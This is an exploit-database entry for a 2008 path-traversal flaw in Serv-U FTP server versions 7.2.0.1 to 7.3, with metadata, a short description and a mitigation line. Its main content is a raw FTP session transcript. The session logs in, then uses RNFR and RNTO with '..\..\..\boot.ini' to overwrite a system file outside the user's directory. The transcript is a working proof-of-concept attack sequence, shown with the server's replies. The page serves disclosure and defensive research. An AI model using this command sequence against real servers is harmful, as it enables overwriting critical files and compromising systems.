header-logo
Suggest Exploit
vendor:
Serv-U
by:
dmnt
7.5
CVSS
HIGH
File Replacement
264
CWE
Product Name: Serv-U
Affected Version From: 7.2.0.1
Affected Version To: 7.3
Patch Exists: YES
Related CWE: N/A
CPE: //a:serv-u
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Serv-U <= 7.2.0.1 / 7.3 ftp file replacement

This vulnerability allows an authenticated user with upload permissions to replace any existing file on the server with a file of their choice. This can be used to overwrite critical system files such as boot.ini, resulting in a complete system compromise.

Mitigation:

Ensure that users with upload permissions are trusted and that all files uploaded are scanned for malicious content.
Source

Exploit-DB raw data:

#Serv-U <= 7.2.0.1 / 7.3 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited

# milw0rm.com [2008-10-03]

Navigation

Suggest Exploit

Services By CQR